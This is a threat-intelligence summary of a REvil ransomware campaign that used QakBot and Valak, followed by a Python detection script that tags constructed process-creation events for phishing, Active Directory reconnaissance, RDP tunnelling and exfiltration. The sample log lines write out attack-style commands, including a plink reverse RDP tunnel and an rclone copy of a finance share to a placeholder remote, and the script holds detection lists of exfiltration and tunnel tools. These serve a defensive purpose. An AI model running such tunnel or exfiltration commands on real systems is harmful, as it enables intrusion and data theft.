| Category | Details |
|---|---|
| Threat Actors | Sodinokibi (REvil), QakBot operators, Valak operators, Ransomware affiliates |
| Campaign Overview | Ransomware actors specialize in phishing-based initial access (e.g., QakBot, Valak), followed by data exfiltration and ransomware deployment to extort victims. Collaboration among threat actors enhances their operations. |
| Target Regions (Victims) | Enterprises with valuable data (e.g., financial, IP, healthcare, HR, and backup data) across multiple industries. |
| Methodology | Phishing emails with malicious Office documents (Excel, Word); use of tools like QakBot, Valak, Cobalt Strike, Rclone, and plink.exe for reconnaissance, lateral movement, and data exfiltration. |
| Product Targeted | Systems with Microsoft Office, Active Directory, and critical internal file shares. |
| Malware Reference | QakBot, Valak, Sodinokibi ransomware |
| Tools Used | Cobalt Strike, NetSupport Manager, Mimikatz, Rclone, MegaSync, MegaCmd, WinSCP, AdFind, nltest, plink.exe, ngrok.exe |
| Vulnerabilities Exploited | No software vulnerability is cited; access relies on phishing and credential harvesting to bypass protections, followed by abuse of built-in Windows functionality (e.g., SMB admin shares, RDP reached through SSH tunnels). |
| TTPs | Double extortion, phishing campaigns, lateral movement (e.g., PowerShell payloads, SCM, and admin shares), credential harvesting, RDP tunneling, and GPO misuse for ransomware deployment. |
| Attribution | Eastern European cybercrime origin; collaboration among ransomware groups like Egregor, Clop, Ryuk, DoppelPaymer. |
| Recommendations | Implement EDR, LAPS, SMB hardening, MFA, PAM, internal network segmentation, vulnerability management, and restrict admin privileges. |
| Source | Security Intelligence |
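The "Methodology", "Tools Used" and "TTPs" rows describe a chain a defender can look for in process-creation telemetry: an Office application spawning a script host (the phishing document), AdFind/nltest reconnaissance, plink.exe used to expose RDP, and Rclone/MegaSync/WinSCP moving data out. The following is an added example, not code from the source article or Security Intelligence, that tags constructed key=value process events with those stages and escalates any account seen in more than one stage. The field names, the log format and every host, user, path and command line are constructed for illustration.

```python
"""Added example: tag process-creation events for the intrusion chain summarised
above (phishing macro -> AD recon -> RDP tunnel -> exfil tool) and escalate
accounts that appear in more than one stage. All records are constructed."""
import re
from dataclasses import dataclass

# Tool names taken from the summary's "Tools Used" and "TTPs" rows.
EXFIL_TOOLS = {"rclone.exe", "megasync.exe", "megacmd.exe", "winscp.exe"}
RECON_TOOLS = {"adfind.exe", "nltest.exe"}
TUNNEL_TOOLS = {"plink.exe", "ngrok.exe"}
OFFICE_APPS = {"winword.exe", "excel.exe"}
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "wscript.exe", "mshta.exe", "rundll32.exe"}

# Constructed sample telemetry (assumed key="value" format, not a real product's schema).
SAMPLE_LOG = r'''
host="WS01" user="CORP\jdoe" parent="C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE" image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" cmdline="powershell.exe -nop -w hidden -c <redacted placeholder>"
host="WS01" user="CORP\jdoe" parent="C:\Windows\System32\cmd.exe" image="C:\Users\jdoe\AppData\Local\Temp\AdFind.exe" cmdline="AdFind.exe -f objectcategory=computer"
host="SRV02" user="CORP\svc_backup" parent="C:\Windows\System32\cmd.exe" image="C:\Windows\Temp\plink.exe" cmdline="plink.exe -R 3389:127.0.0.1:3389 PLACEHOLDER_REMOTE"
host="FS01" user="CORP\svc_backup" parent="C:\Windows\System32\cmd.exe" image="C:\ProgramData\rclone.exe" cmdline="rclone.exe copy \\FS01\Finance remote-placeholder:staging -q"
host="WS07" user="CORP\asmith" parent="C:\Windows\explorer.exe" image="C:\Windows\System32\notepad.exe" cmdline="notepad.exe notes.txt"
'''


@dataclass
class Event:
    host: str
    user: str
    parent: str
    image: str
    cmdline: str


def parse_event(line: str) -> Event:
    """Parse one constructed key="value" record into an Event."""
    fields = dict(re.findall(r'(\w+)="([^"]*)"', line))
    return Event(fields["host"], fields["user"], fields["parent"].lower(),
                 fields["image"].lower(), fields["cmdline"])


def basename(path: str) -> str:
    """File name of a Windows or POSIX path, e.g. 'C:\\x\\plink.exe' -> 'plink.exe'."""
    return path.replace("\\", "/").rsplit("/", 1)[-1]


def classify(ev: Event) -> list[str]:
    """Return the detection tags that apply to one event (possibly none)."""
    img, parent = basename(ev.image), basename(ev.parent)
    args = ev.cmdline.lower().split()
    tags = []
    if parent in OFFICE_APPS and img in SCRIPT_HOSTS:
        tags.append("office_spawned_script_host")  # macro/payload from a phishing document
    if img in RECON_TOOLS:
        tags.append("ad_recon_tool")
    if img in TUNNEL_TOOLS:
        # A remote port-forward (-R) of 3389 exposes RDP to the tunnel's far end.
        rdp = "-r" in args and any("3389" in a for a in args)
        tags.append("rdp_tunnel" if rdp else "tunnel_tool")
    if img in EXFIL_TOOLS:
        # A transfer verb on the command line means data is actually moving.
        transferring = {"copy", "sync", "move"} & set(args)
        tags.append("exfil_tool_transfer" if transferring else "exfil_tool_present")
    return tags


def triage(log_text: str) -> list[dict]:
    """Run every record through classify() and return one alert per tag."""
    alerts = []
    for line in log_text.strip().splitlines():
        ev = parse_event(line)
        for tag in classify(ev):
            alerts.append({"host": ev.host, "user": ev.user,
                           "image": basename(ev.image), "tag": tag})
    return alerts


def escalate(alerts: list[dict]) -> dict:
    """Accounts seen in two or more distinct stages, mapped to their sorted tags."""
    by_user: dict = {}
    for a in alerts:
        by_user.setdefault(a["user"], set()).add(a["tag"])
    return {u: sorted(t) for u, t in by_user.items() if len(t) >= 2}


if __name__ == "__main__":
    found = triage(SAMPLE_LOG)
    for a in found:
        print(f'{a["host"]:6} {a["user"]:18} {a["image"]:16} {a["tag"]}')
    print("escalate:", escalate(SAMPLE_LOG and found))
```

The single-stage tags are noisy on their own (WinSCP and nltest have legitimate uses), which is why the per-account correlation in `escalate()` is the signal to act on; in a real deployment the allow-listing of backup and admin accounts, and the parent/child pairs you treat as suspicious, would be tuned to the environment.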
Disclaimer: The above summary has been generated by an AI language model.